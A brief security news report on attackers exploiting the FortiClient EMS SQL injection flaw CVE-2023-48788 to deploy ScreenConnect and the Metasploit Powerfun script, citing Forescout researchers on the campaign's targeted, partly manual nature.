Attacks exploiting a critical SQL injection vulnerability impacting Fortinet FortiClient EMS devices, tracked as CVE-2023-48788, have been launched to facilitate the deployment of the ScreenConnect software and Metasploit Powerfun script as part of a new campaign, The Hacker News reports.
After unsuccessfully installing ScreenConnect through the exploitation of the flaw in an internet-exposed FortiClient EMS instance owned by an unspecified media firm, threat actors proceeded to leverage the msiexec utility to launch the software before proceeding with the execution of a PowerShell code that enabled Powerfun script download, a report from Forescout showed.
Researchers said that threat actors' failed attempts to install ScreenConnect suggest the presence of a manual component in the attack campaign, which was found to have similarities with previously reported exploitation of the flaw to deliver ScreenConnect and Atera.
"This is evidence that this activity is part of a specific campaign, rather than an exploit included in automated cybercriminal botnets. From our observations, it appears that the actors behind this campaign are not mass scanning but choosing target environments that have VPN appliances," added researchers.